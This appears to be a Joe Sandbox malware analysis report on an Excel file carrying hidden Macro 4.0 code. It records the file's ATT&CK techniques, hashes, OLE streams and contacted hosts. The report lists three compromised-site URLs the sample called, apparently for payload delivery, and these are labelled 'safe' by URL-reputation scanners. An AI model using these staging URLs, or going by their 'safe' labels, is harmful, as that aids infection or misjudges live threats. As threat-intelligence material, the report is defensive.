    Source: C:\Program Files (x86)\Microsoft Office\Office16\EXCEL.EXE | Process information set: NOOPENFILEERRORBOX
    Source: C:\Program Files (x86)\Microsoft Office\Office16\EXCEL.EXE | Process information set: NOOPENFILEERRORBOX
    Source: C:\Program Files (x86)\Microsoft Office\Office16\EXCEL.EXE | Process information set: NOOPENFILEERRORBOX
    Source: C:\Program Files (x86)\Microsoft Office\Office16\EXCEL.EXE | Process information set: NOOPENFILEERRORBOX
    Source: C:\Program Files (x86)\Microsoft Office\Office16\EXCEL.EXE | Process information set: NOOPENFILEERRORBOX
    Source: C:\Program Files (x86)\Microsoft Office\Office16\EXCEL.EXE | Process information set: NOOPENFILEERRORBOX
    Source: C:\Program Files (x86)\Microsoft Office\Office16\EXCEL.EXE | Process information set: NOOPENFILEERRORBOX
    Source: C:\Program Files (x86)\Microsoft Office\Office16\EXCEL.EXE | Process information set: NOOPENFILEERRORBOX
    Source: C:\Program Files (x86)\Microsoft Office\Office16\EXCEL.EXE | Process information set: NOOPENFILEERRORBOX
    Source: C:\Program Files (x86)\Microsoft Office\Office16\EXCEL.EXE | Process information set: NOOPENFILEERRORBOX

    HIPS / PFW / Operating System Protection Evasion:

    Yara detected hidden Macro 4.0 in Excel
    Source: Yara match | File source: doc-220808714.xls, type: SAMPLE

    Mitre Att&ck Matrix

    Techniques are listed per tactic column of the matrix; a number in parentheses is the report's count of matching signatures for that technique.

    Initial Access: Valid Accounts, Default Accounts, Domain Accounts, Local Accounts, Cloud Accounts
    Execution: Scripting (1), Exploitation for Client Execution (23), At (Linux), At (Windows), Cron
    Persistence: DLL Side-Loading (1), Boot or Logon Initialization Scripts, Logon Script (Windows), Logon Script (Mac), Network Logon Script
    Privilege Escalation: Process Injection (1), DLL Side-Loading (1), Logon Script (Windows), Logon Script (Mac), Network Logon Script
    Defense Evasion: Masquerading (1), Disable or Modify Tools (1), Process Injection (1), Scripting (1), DLL Side-Loading (1)
    Credential Access: OS Credential Dumping, LSASS Memory, Security Account Manager, NTDS, LSA Secrets
    Discovery: File and Directory Discovery (1), System Information Discovery (2), Query Registry, System Network Configuration Discovery, Remote System Discovery
    Lateral Movement: Remote Services, Remote Desktop Protocol, SMB/Windows Admin Shares, Distributed Component Object Model, SSH
    Collection: Data from Local System, Data from Removable Media, Data from Network Shared Drive, Input Capture, Keylogging
    Exfiltration: Exfiltration Over Other Network Medium, Exfiltration Over Bluetooth, Automated Exfiltration, Scheduled Transfer, Data Transfer Size Limits
    Command and Control: Encrypted Channel (1), Non-Application Layer Protocol (2), Application Layer Protocol (13), Ingress Tool Transfer (1), Fallback Channels
    Network Effects: Eavesdrop on Insecure Network Communication, Exploit SS7 to Redirect Phone Calls/SMS, Exploit SS7 to Track Device Location, SIM Card Swap, Manipulate Device Communication
    Remote Service Effects: Remotely Track Device Without Authorization, Remotely Wipe Data Without Authorization, Obtain Device Cloud Backups, Carrier Billing Fraud, Manipulate App Store Rankings or Ratings
    Impact: Modify System Partition, Device Lockout, Delete Device Data

    Behavior Graph

    (behavior graph image not reproduced in this extract; its legend is omitted)

    Screenshots

    (screenshot thumbnails not reproduced in this extract)

    Antivirus, Machine Learning and Genetic Malware Detection

    Initial Sample

    Source | Detection | Scanner
    doc-220808714.xls | 13% | Virustotal

    Dropped Files

    No Antivirus matches

    Unpacked PE Files

    No Antivirus matches

    Domains

    Source | Detection | Scanner
    ohemaa.org | 0% | Virustotal
    amerident.com.do | 1% | Virustotal
    madieandme.com.au | 0% | Virustotal

    URLs

    Source | Detection | Scanner | Label
    https://roaming.edog. | 0% | URL Reputation | safe
    https://cdn.entity. | 0% | URL Reputation | safe
    https://powerlift.acompli.net | 0% | URL Reputation | safe
    https://rpsticket.partnerservices.getmicrosoftkey.com | 0% | URL Reputation | safe
    https://cortana.ai | 0% | URL Reputation | safe
    https://api.aadrm.com/ | 0% | URL Reputation | safe
    https://ofcrecsvcapi-int.azurewebsites.net/ | 0% | URL Reputation | safe
    https://augloop.office.com;https://augloop-int.officeppe.com;https://augloop-dogfood.officeppe.com;h | 0% | Avira URL Cloud | safe
    https://res.getmicrosoftkey.com/api/redemptionevents | 0% | URL Reputation | safe
    https://powerlift-frontdesk.acompli.net | 0% | URL Reputation | safe
    https://officeci.azurewebsites.net/api/ | 0% | URL Reputation | safe
    https://madieandme.com.au/xnkpOLnvlN6T/ocrafh.html | 0% | Avira URL Cloud | safe
    https://store.office.cn/addinstemplate | 0% | URL Reputation | safe
    https://api.aadrm.com | 0% | Avira URL Cloud | safe
    https://store.officeppe.com/addinstemplate | 0% | URL Reputation | safe
    https://dev0-api.acompli.net/autodetect | 0% | URL Reputation | safe
    https://www.odwebp.svc.ms | 0% | URL Reputation | safe
    https://dataservice.o365filtering.com/ | 0% | URL Reputation | safe
    https://officesetup.getmicrosoftkey.com | 0% | URL Reputation | safe
    https://prod-global-autodetect.acompli.net/autodetect | 0% | URL Reputation | safe
    https://ncus.contentsync. | 0% | URL Reputation | safe
    https://apis.live.net/v5.0/ | 0% | URL Reputation | safe
    https://wus2.contentsync. | 0% | URL Reputation | safe
    https://asgsmsproxyapi.azurewebsites.net/ | 0% | URL Reputation | safe
    https://amerident.com.do/xdOMlaB0XJ7/ocraf.html | 0% | Avira URL Cloud | safe
    https://dataservice.o365filtering.com/PolicySync/PolicySync.svc/SyncFile | 0% | URL Reputation | safe
    https://ncus.pagecontentsync. | 0% | URL Reputation | safe
    https://skyapi.live.net/Activity/ | 0% | URL Reputation | safe
    https://dataservice.o365filtering.com | 0% | URL Reputation | safe
    https://ohemaa.org/HUVm9mDKLW9C/ocrafhh.html | 0% | Avira URL Cloud | safe

    Domains and IPs

    Contacted Domains

    Name | IP | Active | Malicious | Antivirus Detection | Reputation
    ohemaa.org | 172.93.99.178 | true | false | - | unknown
    amerident.com.do | 108.179.242.179 | true | false | - | unknown
    madieandme.com.au | 101.0.112.4 | true | false | - | unknown

    Contacted URLs

    Name | Malicious | Antivirus Detection | Reputation
    https://madieandme.com.au/xnkpOLnvlN6T/ocrafh.html | false | Avira URL Cloud: safe | unknown
    https://amerident.com.do/xdOMlaB0XJ7/ocraf.html | false | Avira URL Cloud: safe | unknown
    https://ohemaa.org/HUVm9mDKLW9C/ocrafhh.html | false | Avira URL Cloud: safe | unknown

    URLs from Memory and Binaries

    Source for every entry in this table: 028E0688-7982-482A-A558-DEEDEEDCA262.0.dr

    Name | Malicious | Antivirus Detection | Reputation
    https://api.diagnosticssdf.office.com | false | - | high
    https://login.microsoftonline.com/ | false | - | high
    https://shell.suite.office.com:1443 | false | - | high
    https://login.windows.net/72f988bf-86f1-41af-91ab-2d7cd011db47/oauth2/authorize | false | - | high
    https://autodiscover-s.outlook.com/ | false | - | high
    https://roaming.edog. | false | URL Reputation: safe | unknown
    https://insertmedia.bing.office.net/images/officeonlinecontent/browse?cp=Flickr | false | - | high
    https://cdn.entity. | false | URL Reputation: safe | unknown
    https://api.addins.omex.office.net/appinfo/query | false | - | high
    https://clients.config.office.net/user/v1.0/tenantassociationkey | false | - | high
    https://dev.virtualearth.net/REST/V1/GeospatialEndpoint/ | false | - | high
    https://powerlift.acompli.net | false | URL Reputation: safe | unknown
    https://rpsticket.partnerservices.getmicrosoftkey.com | false | URL Reputation: safe | unknown
    https://lookup.onenote.com/lookup/geolocation/v1 | false | - | high
    https://cortana.ai | false | URL Reputation: safe | unknown
    https://apc.learningtools.onenote.com/learningtoolsapi/v2.0/getfreeformspeech | false | - | high
    https://cloudfiles.onenote.com/upload.aspx | false | - | high
    https://syncservice.protection.outlook.com/PolicySync/PolicySync.svc/SyncFile | false | - | high
    https://entitlement.diagnosticssdf.office.com | false | - | high
    https://na01.oscs.protection.outlook.com/api/SafeLinksApi/GetPolicy | false | - | high
    https://api.aadrm.com/ | false | URL Reputation: safe | unknown
    https://ofcrecsvcapi-int.azurewebsites.net/ | false | URL Reputation: safe | unknown
    https://dataservice.protection.outlook.com/PsorWebService/v1/ClientSyncFile/MipPolicies | false | - | high
    https://api.microsoftstream.com/api/ | false | - | high
    https://insertmedia.bing.office.net/images/hosted?host=office&adlt=strict&hostType=Immersive | false | - | high
    https://cr.office.com | false | - | high
    https://augloop.office.com;https://augloop-int.officeppe.com;https://augloop-dogfood.officeppe.com;h | false | Avira URL Cloud: safe | low
    https://portal.office.com/account/?ref=ClientMeControl | false | - | high
    https://graph.ppe.windows.net | false | - | high
    https://res.getmicrosoftkey.com/api/redemptionevents | false | URL Reputation: safe | unknown
    https://powerlift-frontdesk.acompli.net | false | URL Reputation: safe | unknown
    https://tasks.office.com | false | - | high
    https://officeci.azurewebsites.net/api/ | false | URL Reputation: safe | unknown
    https://sr.outlook.office.net/ws/speech/recognize/assistant/work | false | - | high
    https://store.office.cn/addinstemplate | false | URL Reputation: safe | unknown
    https://api.aadrm.com | false | Avira URL Cloud: safe | unknown
    https://outlook.office.com/autosuggest/api/v1/init?cvid= | false | - | high
    https://globaldisco.crm.dynamics.com | false | - | high
    https://nam.learningtools.onenote.com/learningtoolsapi/v2.0/getfreeformspeech | false | - | high
    https://store.officeppe.com/addinstemplate | false | URL Reputation: safe | unknown
    https://dev0-api.acompli.net/autodetect | false | URL Reputation: safe | unknown
    https://www.odwebp.svc.ms | false | URL Reputation: safe | unknown
    https://api.powerbi.com/v1.0/myorg/groups | false | - | high
    https://web.microsoftstream.com/video/ | false | - | high
    https://graph.windows.net | false | - | high
    https://dataservice.o365filtering.com/ | false | URL Reputation: safe | unknown
    https://officesetup.getmicrosoftkey.com | false | URL Reputation: safe | unknown
    https://analysis.windows.net/powerbi/api | false | - | high
    https://prod-global-autodetect.acompli.net/autodetect | false | URL Reputation: safe | unknown
    https://outlook.office365.com/autodiscover/autodiscover.json | false | - | high
    https://powerpoint.uservoice.com/forums/288952-powerpoint-for-ipad-iphone-ios | false | - | high
    https://eur.learningtools.onenote.com/learningtoolsapi/v2.0/getfreeformspeech | false | - | high
    https://pf.directory.live.com/profile/mine/System.ShortCircuitProfile.json | false | - | high
    https://ncus.contentsync. | false | URL Reputation: safe | unknown
    https://onedrive.live.com/about/download/?windows10SyncClientInstalled=false | false | - | high
    https://webdir.online.lync.com/autodiscover/autodiscoverservice.svc/root/ | false | - | high
    http://weather.service.msn.com/data.aspx | false | - | high
    https://apis.live.net/v5.0/ | false | URL Reputation: safe | unknown
    https://officemobile.uservoice.com/forums/929800-office-app-ios-and-ipad-asks | false | - | high
    https://word.uservoice.com/forums/304948-word-for-ipad-iphone-ios | false | - | high
    https://autodiscover-s.outlook.com/autodiscover/autodiscover.xml | false | - | high
    https://management.azure.com | false | - | high
    https://outlook.office365.com | false | - | high
    https://wus2.contentsync. | false | URL Reputation: safe | unknown
    https://incidents.diagnostics.office.com | false | - | high
    https://clients.config.office.net/user/v1.0/ios | false | - | high
    https://insertmedia.bing.office.net/odc/insertmedia | false | - | high
    https://o365auditrealtimeingestion.manage.office.com | false | - | high
    https://outlook.office365.com/api/v1.0/me/Activities | false | - | high
    https://api.office.net | false | - | high
    https://incidents.diagnosticssdf.office.com | false | - | high
    https://asgsmsproxyapi.azurewebsites.net/ | false | URL Reputation: safe | unknown
    https://clients.config.office.net/user/v1.0/android/policies | false | - | high
    https://entitlement.diagnostics.office.com | false | - | high
    https://pf.directory.live.com/profile/mine/WLX.Profiles.IC.json | false | - | high
    https://substrate.office.com/search/api/v2/init | false | - | high
    https://outlook.office.com/ | false | - | high
    https://storage.live.com/clientlogs/uploadlocation | false | - | high
    https://outlook.office365.com/ | false | - | high
    https://webshell.suite.office.com | false | - | high
    https://insertmedia.bing.office.net/images/officeonlinecontent/browse?cp=OneDrive | false | - | high
    https://substrate.office.com/search/api/v1/SearchHistory | false | - | high
    https://management.azure.com/ | false | - | high
                                                                                                                            https://login.windows.net/common/oauth2/authorize028E0688-7982-482A-A558-DEEDEEDCA262.0.drfalse
                                                                                                                              high
                                                                                                                              https://dataservice.o365filtering.com/PolicySync/PolicySync.svc/SyncFile028E0688-7982-482A-A558-DEEDEEDCA262.0.drfalse
                                                                                                                              • URL Reputation: safe
                                                                                                                              unknown
                                                                                                                              https://graph.windows.net/028E0688-7982-482A-A558-DEEDEEDCA262.0.drfalse
                                                                                                                                high
                                                                                                                                https://api.powerbi.com/beta/myorg/imports028E0688-7982-482A-A558-DEEDEEDCA262.0.drfalse
                                                                                                                                  high
                                                                                                                                  https://devnull.onenote.com028E0688-7982-482A-A558-DEEDEEDCA262.0.drfalse
                                                                                                                                    high
                                                                                                                                    https://ncus.pagecontentsync.028E0688-7982-482A-A558-DEEDEEDCA262.0.drfalse
                                                                                                                                    • URL Reputation: safe
                                                                                                                                    unknown
                                                                                                                                    https://r4.res.office365.com/footprintconfig/v1.7/scripts/fpconfig.json028E0688-7982-482A-A558-DEEDEEDCA262.0.drfalse
                                                                                                                                      high
                                                                                                                                      https://messaging.office.com/028E0688-7982-482A-A558-DEEDEEDCA262.0.drfalse
                                                                                                                                        high
                                                                                                                                        https://dataservice.protection.outlook.com/PolicySync/PolicySync.svc/SyncFile028E0688-7982-482A-A558-DEEDEEDCA262.0.drfalse
                                                                                                                                          high
                                                                                                                                          https://augloop.office.com/v2028E0688-7982-482A-A558-DEEDEEDCA262.0.drfalse
                                                                                                                                            high
                                                                                                                                            https://insertmedia.bing.office.net/images/officeonlinecontent/browse?cp=Bing028E0688-7982-482A-A558-DEEDEEDCA262.0.drfalse
                                                                                                                                              high
                                                                                                                                              https://skyapi.live.net/Activity/028E0688-7982-482A-A558-DEEDEEDCA262.0.drfalse
                                                                                                                                              • URL Reputation: safe
                                                                                                                                              unknown
                                                                                                                                              https://clients.config.office.net/user/v1.0/mac028E0688-7982-482A-A558-DEEDEEDCA262.0.drfalse
                                                                                                                                                high
                                                                                                                                                https://dataservice.o365filtering.com028E0688-7982-482A-A558-DEEDEEDCA262.0.drfalse
                                                                                                                                                • URL Reputation: safe
                                                                                                                                                unknown

Contacted IPs


Public

IP | Domain | Country | ASN | ASN Name | Malicious
101.0.112.4 | madieandme.com.au | Australia | 55803 | DIGITALPACIFIC-AUDigitalPacificPtyLtdAustraliaAU | false
108.179.242.179 | amerident.com.do | United States | 46606 | UNIFIEDLAYER-AS-1US | false
172.93.99.178 | ohemaa.org | United States | 23470 | RELIABLESITEUS | false

General Information

Joe Sandbox Version: 33.0.0 White Diamond
Analysis ID: 501226
Start date: 12.10.2021
Start time: 17:20:58
Joe Sandbox Product: CloudBasic
Overall analysis duration: 0h 6m 21s
Hypervisor based Inspection enabled: false
Report type: full
Sample file name: doc-220808714.xls
Cookbook file name: defaultwindowsofficecookbook.jbs
Analysis system description: Windows 10 64 bit v1803 with Office Professional Plus 2016, Chrome 85, IE 11, Adobe Reader DC 19, Java 8 Update 211
Run name: Potential for more IOCs and behavior
Number of analysed new started processes analysed: 29
Number of new started drivers analysed: 0
Number of existing processes analysed: 0
Number of existing drivers analysed: 0
Number of injected processes analysed: 0
Technologies:
• HCA enabled
• EGA enabled
• HDC enabled
• AMSI enabled
Analysis Mode: default
Analysis stop reason: Timeout
Detection: MAL
Classification: mal76.expl.winXLS@7/1@3/3
EGA Information: Failed
HDC Information: Failed
HCA Information:
• Successful, ratio: 100%
• Number of executed functions: 0
• Number of non-executed functions: 0
Cookbook Comments:
• Adjust boot time
• Enable AMSI
• Found application associated with file extension: .xls
• Found Word or Excel or PowerPoint or XPS Viewer
• Attach to Office via COM
• Scroll down
• Close Viewer
Warnings:
• Exclude process from analysis (whitelisted): MpCmdRun.exe, BackgroundTransferHost.exe, HxTsr.exe, RuntimeBroker.exe, backgroundTaskHost.exe, SgrmBroker.exe, conhost.exe, svchost.exe, wuapihost.exe
• Excluded IPs from analysis (whitelisted): 95.100.218.79, 52.109.76.68, 52.109.88.37, 52.109.12.24, 52.109.12.22, 95.100.216.89, 20.82.209.183, 20.54.110.249, 40.112.88.60, 20.199.120.182, 13.107.4.50, 2.20.178.10, 2.20.178.56, 20.199.120.85, 20.82.210.154, 20.199.120.151
• Excluded domains from analysis (whitelisted): prod-w.nexus.live.com.akadns.net, store-images.s-microsoft.com-c.edgekey.net, iris-de-prod-azsc-neu-b.northeurope.cloudapp.azure.com, b1ns.c-0001.c-msedge.net, a767.dspw65.akamai.net, fs-wildcard.microsoft.com.edgekey.net, fs-wildcard.microsoft.com.edgekey.net.globalredir.akadns.net, arc.msn.com, e12564.dspb.akamaiedge.net, wns.notify.trafficmanager.net, consumer-displaycatalogrp-aks2aks-europe.md.mp.microsoft.com.akadns.net, nexus.officeapps.live.com, arc.trafficmanager.net, officeclient.microsoft.com, displaycatalog.mp.microsoft.com, prod.fs.microsoft.com.akadns.net, b1ns.au-msedge.net, iris-de-prod-azsc-neu.northeurope.cloudapp.azure.com, client.wns.windows.com, fs.microsoft.com, displaycatalog-rp-europe.md.mp.microsoft.com.akadns.net, prod.configsvc1.live.com.akadns.net, neu-displaycatalogrp.frontdoor.bigcatalog.commerce.microsoft.com, ris-prod.trafficmanager.net, wu-shim.trafficmanager.net, asf-ris-prod-neu.northeurope.cloudapp.azure.com, e1723.g.akamaiedge.net, ctldl.windowsupdate.com, c-0001.c-msedge.net, download.windowsupdate.com.edgesuite.net, ris.api.iris.microsoft.com, store-images.s-microsoft.com, config.officeapps.live.com, europe.configsvc1.live.com.akadns.net, displaycatalog-rp.md.mp.microsoft.com.akadns.net
• Not all processes were analyzed; the report is missing behavior information

Simulations

Behavior and APIs

No simulations

Joe Sandbox View / Context

IPs

Rows per match: Associated Sample Name / URL | Detection | Context

Match: 101.0.112.4
  doc-220808714.xls | malicious
Match: 108.179.242.179
  doc-220808714.xls | malicious
  414d46ac_by_Libranalysis.xls | malicious
  414d46ac_by_Libranalysis.xls | malicious
Match: 172.93.99.178
  430#U0437.js | malicious | globalawardscheme.com/wp-content/cache/nextend/web/combined/sserv.jpg
  430#U0437.js | malicious | globalawardscheme.com/wp-content/cache/nextend/web/combined/sserv.jpg
  34029.doc | malicious | justevolvewithgrace.com/cgi-sys/suspendedpage.cgi
  http://51.254.121.123/wp-content/0AR/com/US | malicious | justevolvewithgrace.com/cgi-sys/suspendedpage.cgi
  8590170.doc | malicious | justevolvewithgrace.com/cgi-sys/suspendedpage.cgi

Domains

Rows per match: Associated Sample Name / URL | Detection | Context

Match: madieandme.com.au
  doc-220808714.xls | malicious | 101.0.112.4
Match: amerident.com.do
  doc-220808714.xls | malicious | 108.179.242.179
  414d46ac_by_Libranalysis.xls | malicious | 108.179.242.179
  414d46ac_by_Libranalysis.xls | malicious | 108.179.242.179

ASN

Rows per match: Associated Sample Name / URL | Detection | Context

Match: DIGITALPACIFIC-AUDigitalPacificPtyLtdAustraliaAU
  doc-220808714.xls | malicious | 101.0.112.4
  ITT - PPCL-2021-0515-PKG4 - pipping and drilling Services.doc | malicious | 116.90.56.138
  Inquiry-Doors.exe | malicious | 101.0.91.38
  product specification.exe | malicious | 101.0.117.102
  7PUgGUWM2l | malicious | 182.160.170.135
  Attached Quotation.exe | malicious | 101.0.117.102
  Cd9EA600XXdm0tl.exe | malicious | 101.0.117.102
  E8ljMuBj9L | malicious | 111.67.13.18
  QcXQmNSaSp | malicious | 49.156.27.62
  arm7 | malicious | 111.67.13.28
  QYUNlRkkn1.exe | malicious | 203.16.60.34
  6Y5P9BoimMLclbt.exe | malicious | 101.0.117.102
  gunzipped.exe | malicious | 101.0.117.102
  SecuriteInfo.com.Variant.Bulz.627351.21436.exe | malicious | 101.0.117.102
  ENQUIRY.exe | malicious | 101.0.117.102
  16wKmiVoPj05ynr.exe | malicious | 101.0.117.102
  PURCHASE ORDER.exe | malicious | 101.0.117.102
  PO.NO.V21015.exe | malicious | 101.0.117.102
  New Inquiry 21411JA20pdf.exe | malicious | 101.0.117.102
  fsd8ks3VNb.exe | malicious | 101.0.105.170
Match: UNIFIEDLAYER-AS-1US
  doc-220808714.xls | malicious
                                                                                                                                                        • 108.179.242.179
                                                                                                                                                        jjBv8SpZXm.exeGet hashmaliciousBrowse
                                                                                                                                                        • 192.185.0.218
                                                                                                                                                        Scan_0978.exeGet hashmaliciousBrowse
                                                                                                                                                        • 173.254.94.114
                                                                                                                                                        pKD3j672HL.exeGet hashmaliciousBrowse
                                                                                                                                                        • 192.185.131.113
                                                                                                                                                        heiedrNhQ8Get hashmaliciousBrowse
                                                                                                                                                        • 142.5.140.216
                                                                                                                                                        Kredi Karti Hesap #U00d6zeti - 4508xxxxxxxx0017.exeGet hashmaliciousBrowse
                                                                                                                                                        • 192.185.163.68
                                                                                                                                                        lod2.xlsxGet hashmaliciousBrowse
                                                                                                                                                        • 162.241.226.37
                                                                                                                                                        Contract and PO No.908876.exeGet hashmaliciousBrowse
                                                                                                                                                        • 192.185.84.191
                                                                                                                                                        iwah6jVhmwGet hashmaliciousBrowse
                                                                                                                                                        • 98.130.22.83
                                                                                                                                                        BL-210915L0.exeGet hashmaliciousBrowse
                                                                                                                                                        • 192.254.180.165
                                                                                                                                                        mFKC2tSCJXGet hashmaliciousBrowse
                                                                                                                                                        • 76.163.226.11
                                                                                                                                                        Urgent Inquiry.exeGet hashmaliciousBrowse
                                                                                                                                                        • 192.185.84.191
                                                                                                                                                        PO 007661721.exeGet hashmaliciousBrowse
                                                                                                                                                        • 192.185.84.191
                                                                                                                                                        P.I 099880990.xlsxGet hashmaliciousBrowse
                                                                                                                                                        • 162.214.65.211
                                                                                                                                                        1QbmrgleyAWkb39.exeGet hashmaliciousBrowse
                                                                                                                                                        • 192.185.84.191
                                                                                                                                                        (RG25LGSJ).exeGet hashmaliciousBrowse
                                                                                                                                                        • 162.241.216.179
                                                                                                                                                        103 Ref 2853801324189923.exeGet hashmaliciousBrowse
                                                                                                                                                        • 67.20.76.184
                                                                                                                                                        doc_0862413890.exeGet hashmaliciousBrowse
                                                                                                                                                        • 74.220.199.6
                                                                                                                                                        swift.Telex.xlsGet hashmaliciousBrowse
                                                                                                                                                        • 192.185.115.3
                                                                                                                                                        g4225Fz3HKGet hashmaliciousBrowse
                                                                                                                                                        • 162.214.19.189

JA3 Fingerprints

Match | Associated Sample Name / URL | SHA 256 | Detection | Link | Context

Dropped Files

No context

Created / dropped Files

C:\Users\user\AppData\Local\Microsoft\Office\16.0\WebServiceCache\AllUsers\officeclient.microsoft.com\028E0688-7982-482A-A558-DEEDEEDCA262
Process: C:\Program Files (x86)\Microsoft Office\Office16\EXCEL.EXE
File Type: XML 1.0 document, UTF-8 Unicode text, with very long lines, with CRLF line terminators
Category: dropped
Size (bytes): 138049
Entropy (8bit): 5.359424052362488
Encrypted: false
SSDEEP: 1536:xcQIKNZrBdA3gBwfnQ9DQW+zBY34Zzi7nXboOidXVE6LWME9:5WQ9DQW+zbXa1
MD5: 160312EA7CD3B99B79081826CD763914
SHA1: 5D9331D0C5FCE451C50D3652282077455842C956
SHA-256: 4F10E93B712A36E007C3A8CA73887B02CE038FC37ABDB871407C62236876E17A
SHA-512: 9394F9AB27E2AB7E0A660213EFE818AA7F36E09129684C9C987B8F5626856B9B832EDD7245FB3B3ECBE173EEFFB9DA9E4A79C5D5850EB5518CE463EBA3921F08
Malicious: false
Reputation: low
Preview: <?xml version="1.0" encoding="utf-8"?>..<o:OfficeConfig xmlns:o="urn:schemas-microsoft-com:office:office">.. <o:services o:GenerationTime="2021-10-12T15:21:56">.. Build: 16.0.14604.30525-->.. <o:default>.. <o:ticket o:headerName="Authorization" o:headerValue="{}" />.. </o:default>.. <o:service o:name="Research">.. <o:url>https://rr.office.microsoft.com/research/query.asmx</o:url>.. </o:service>.. <o:service o:name="ORedir">.. <o:url>https://o15.officeredir.microsoft.com/r</o:url>.. </o:service>.. <o:service o:name="ORedirSSL">.. <o:url>https://o15.officeredir.microsoft.com/r</o:url>.. </o:service>.. <o:service o:name="ClViewClientHelpId">.. <o:url>https://[MAX.BaseHost]/client/results</o:url>.. </o:service>.. <o:service o:name="ClViewClientHome">.. <o:url>https://[MAX.BaseHost]/client/results</o:url>.. </o:service>.. <o:service o:name="ClViewClientTemplate">.. <o:url>https://ocsa.office.microsoft.com/client/15/help/template</o:url>.. </o:service>.. <o:

Static File Info

General

File type: Composite Document File V2 Document, Little Endian, Os: Windows, Version 10.0, Code page: 1251, Name of Creating Application: Microsoft Excel, Create Time/Date: Fri Jun 5 19:19:34 2015, Last Saved Time/Date: Tue Oct 12 08:22:59 2021, Security: 0
Entropy (8bit): 7.531872402672375
TrID:
• Microsoft Excel sheet (30009/1) 78.94%
• Generic OLE2 / Multistream Compound File (8008/1) 21.06%
File name: doc-220808714.xls
File size: 241152
MD5: 2654fdca7197f542cbd0be823a2a2a9f
SHA1: 149b43a5f8f4d9bd63720b408f6c4e2a86401c6a
SHA256: f5a313c5353ae0d1cede7bd5e234bfd3a4d7abb5e877bd2903d8d7572e9ee4d6
SHA512: 1534994b08b95c1a9879afba6a857817146b3aaa06484a65ff89f418b5ca31fa7ffbc2076efdface8f0036f5e3a7f98e95fe0120df3bfe2c2b06ea8e3b96bcaf
SSDEEP: 6144:cKpb8rGYrMPe3q7Q0XV5xtuEsi8/dgq9jWXcZZRBTq1BOzTwvOsPDslAvS32vI7p:09jVzTmszTwvTDy33LvfP1OWr
File Content Preview: ........................>......................................................................................................................................................................................................................................

File Icon

Icon Hash: 74ecd4c6c3c6c4d8

Static OLE Info

General

Document Type: OLE
Number of OLE Files: 1

OLE File "doc-220808714.xls"

Indicators

Has Summary Info: True
Application Name: Microsoft Excel
Encrypted Document: False
Contains Word Document Stream: False
Contains Workbook/Book Stream: True
Contains PowerPoint Document Stream: False
Contains Visio Document Stream: False
Contains ObjectPool Stream:
Flash Objects Count:
Contains VBA Macros: True

Summary

Code Page: 1251
Author:
Last Saved By:
Create Time: 2015-06-05 18:19:34
Last Saved Time: 2021-10-12 07:22:59
Creating Application: Microsoft Excel
Security: 0

Document Summary

Document Code Page: 1251
Thumbnail Scaling Desired: False
Company:
Contains Dirty Links: False
Shared Document: False
Changed Hyperlinks: False
Application Version: 1048576

Streams

Stream Path: \x5DocumentSummaryInformation, File Type: data, Stream Size: 4096
General
Stream Path: \x5DocumentSummaryInformation
File Type: data
Stream Size: 4096
Entropy: 0.43766981378
Base64 Encoded: False
Data ASCII: . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . + , . . 0 . . . < . . . . . . . . . . . P . . . . . . . X . . . . . . . d . . . . . . . l . . . . . . . t . . . . . . . | . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . S h e e t . . . . . S i m b b 1 . . . . . S i m b b 2 . . . . . S i m b b 3 . . . . . G G T . . . . . B r e r 1
Data Raw: fe ff 00 00 0a 00 02 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 01 00 00 00 02 d5 cd d5 9c 2e 1b 10 93 97 08 00 2b 2c f9 ae 30 00 00 00 3c 01 00 00 09 00 00 00 01 00 00 00 50 00 00 00 0f 00 00 00 58 00 00 00 17 00 00 00 64 00 00 00 0b 00 00 00 6c 00 00 00 10 00 00 00 74 00 00 00 13 00 00 00 7c 00 00 00 16 00 00 00 84 00 00 00 0d 00 00 00 8c 00 00 00 0c 00 00 00 f9 00 00 00

Stream Path: \x5SummaryInformation, File Type: data, Stream Size: 4096
General
Stream Path: \x5SummaryInformation
File Type: data
Stream Size: 4096
Entropy: 0.279171118094
Base64 Encoded: False
Data ASCII: . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . O h . . . . . + ' . . 0 . . . . . . . . . . . . . . . @ . . . . . . . H . . . . . . . X . . . . . . . h . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . M i c r o s o f t E x c e l . @ . . . . ? R , . . . . @ . . . . . . . 9 . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . .
Data Raw: fe ff 00 00 0a 00 02 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 01 00 00 00 e0 85 9f f2 f9 4f 68 10 ab 91 08 00 2b 27 b3 d9 30 00 00 00 a0 00 00 00 07 00 00 00 01 00 00 00 40 00 00 00 04 00 00 00 48 00 00 00 08 00 00 00 58 00 00 00 12 00 00 00 68 00 00 00 0c 00 00 00 80 00 00 00 0d 00 00 00 8c 00 00 00 13 00 00 00 98 00 00 00 02 00 00 00 e3 04 00 00 1e 00 00 00 08 00 00 00

Stream Path: Workbook, File Type: Applesoft BASIC program data, first line number 16, Stream Size: 229526
General
Stream Path: Workbook
File Type: Applesoft BASIC program data, first line number 16
Stream Size: 229526
Entropy: 7.71393359025
Base64 Encoded: True
Data ASCII: . . . . . . . . Z O . . . . . . . . . . . . . . . . . . . . . . . . . . \\ . p . . . . . . 4 . < . 8 . = . B . . . . . a . . . . . . . . . = . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . = . . . . . . . . V e 1 8 . . . . . . . X . @ . . . . .
Data Raw: 09 08 10 00 00 06 05 00 5a 4f cd 07 c9 00 02 00 06 08 00 00 e1 00 02 00 b0 04 c1 00 02 00 00 00 e2 00 00 00 5c 00 70 00 05 00 01 10 04 34 04 3c 04 38 04 3d 04 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20

Network Behavior

Network Port Distribution

TCP Packets

Timestamp | Source Port | Dest Port | Source IP | Dest IP
